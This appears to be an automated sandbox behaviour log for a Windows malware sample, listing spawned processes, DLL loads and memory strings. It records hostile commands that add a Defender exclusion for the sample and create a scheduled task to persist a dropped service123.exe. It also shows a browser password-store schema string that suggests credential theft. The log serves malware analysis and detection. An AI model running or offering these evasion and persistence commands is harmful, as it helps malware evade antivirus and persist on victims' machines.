            Source: wab.exe, 00000004.00000003.1490015529.0000000003569000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1490207526.000000000356A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1487958252.0000000003568000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1486117052.000000000356B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1485754962.0000000003568000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1489785305.0000000003568000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1485211748.000000000356C000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035169918.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035803376.00000000031CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeReversingLabs: Detection: 18%
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exeString found in binary or memory: /addr_imp
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7488 -s 900
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
            Source: unknownProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: unknownProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exe C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exe C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeProcess created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe "C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe"
            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: webio.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeSection loaded: powrprof.dll
            Source: C:\Users\user\Documents\iofolko5\RXdQ_uc4E2f9zze8GHsJCP4V.exeSection loaded: umpdc.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: winhttp.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: webio.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: winnsi.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: wldp.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: propsys.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: dlnashext.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: wpdshext.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: profapi.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: edputil.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: netutils.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: wintypes.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: appresolver.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: slc.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: userenv.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: sppc.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeSection loaded: msasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dll
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: version.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: python3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libffi-8.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: propsys.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: vcruntime140_1.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: libssl-3.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: tcl86t.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: tk86t.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: netapi32.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: userenv.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: zlib1.dll
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeSection loaded: logoncli.dll
